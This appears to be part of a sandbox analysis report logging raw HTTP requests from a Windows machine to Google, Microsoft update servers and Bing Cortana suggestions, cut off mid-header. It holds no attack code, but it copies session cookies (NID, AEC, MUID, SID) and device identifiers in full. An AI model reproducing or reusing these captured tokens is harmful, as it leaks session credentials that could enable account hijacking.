NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
Source: global traffic HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/m=sy1em,P10Owf,sy1de,sy1dc,syr0,gSZvdb,sy10q,sy10p,WlNQGd,syr5,syr2,syr1,syqz,DPreE,sy112,sy110,nabPbb,sy10k,sy10i,syjv,syo3,CnSW2d,kQvlef,sy111,fXO0xe?xjs=s4 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
Source: global traffic HTTP traffic detected: GET /logos/2024/popcorn/rc4/preload-bg-sprite.jpg HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
Source: global traffic HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/m=lOO0Vd,sy8s,P6sQOc?xjs=s4 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=SBWgPo8m6MLKgX2&MD=VCxfKomC HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /logos/2024/popcorn/rc4/google_frame_mask.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
Source: global traffic HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/m=aLUfP?xjs=s4 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
Source: global traffic HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/m=lOO0Vd,sy8s,P6sQOc?xjs=s4 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /gen_204?atyp=i&ct=psnt&cad=&nt=navigate&ei=64P1ZseiHfKwi-gPg-6IsAw&zx=1727366130436&opi=89978449 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
Source: global traffic HTTP traffic detected: GET /logos/2024/popcorn/rc4/google_frame_mask.png HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
Source: global traffic HTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
Source: global traffic HTTP traffic detected: GET /manifest/threshold.appcache HTTP/1.1Accept: */*Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitOrigin: https://www.bing.comAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=3a628620&IPMID=1707317755885; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rb/17/jnc,nj/4bnLx4S3ZRMpYV30k3R5vRy8JVg.js?bu=DygxeIQBiQGMAYEBe37EAccBMbcBMcoB&or=w HTTP/1.1Accept: */*Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: r.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133
Source: global traffic HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=cmd&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=3&cvid=2f3ed6de36a14f3ebfed8e293d185e72&ig=ab8cc421015045729b90f8501479ca3a HTTP/1.1Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHX-Agent-DeviceId: 01000A4109009A83X-BM-CBT: 1727366134X-BM-ClientFeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStoreX-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x640X-BM-DeviceDimensionsLogical: 784x640X-BM-DeviceScale: 100X-BM-DTZ: -240X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75X-Device-ClientSession: 64942352AA494B6483DE4D15F1BB38FCX-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A4109009A83X-MSEdge-ExternalExp: d-thshld42,dsbdailyset_c,expmegaclick_cf,hashexpt3,iffsqloptwin10c,msbdsbedu9cf,wsbqfnewsynonym,wsbref-t,wsbswgc-t2X-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=c&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=2f3ed6de36a14f3ebfed8e293d185e72&ig=6e3b69b5871b441ca54bf33441a9e1fe HTTP/1.1Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHX-Agent-DeviceId: 01000A4109009A83X-BM-CBT: 1727366134X-BM-ClientFeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStoreX-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x640X-BM-DeviceDimensionsLogical: 784x640X-BM-DeviceScale: 100X-BM-DTZ: -240X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75X-Device-ClientSession: 64942352AA494B6483DE4D15F1BB38FCX-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A4109009A83X-MSEdge-ExternalExp: d-thshld42,dsbdailyset_c,expmegaclick_cf,hashexpt3,iffsqloptwin10c,msbdsbedu9cf,wsbqfnewsynonym,wsbref-t,wsbswgc-t2X-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=cm&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=2f3ed6de36a14f3ebfed8e293d185e72&ig=6640447e40b340b6b06581e0487d07db HTTP/1.1Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHX-Agent-DeviceId: 01000A4109009A83X-BM-CBT: 1727366134X-BM-ClientFeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStoreX-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x640X-BM-DeviceDimensionsLogical: 784x640X-BM-DeviceScale: 100X-BM-DTZ: -240X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: 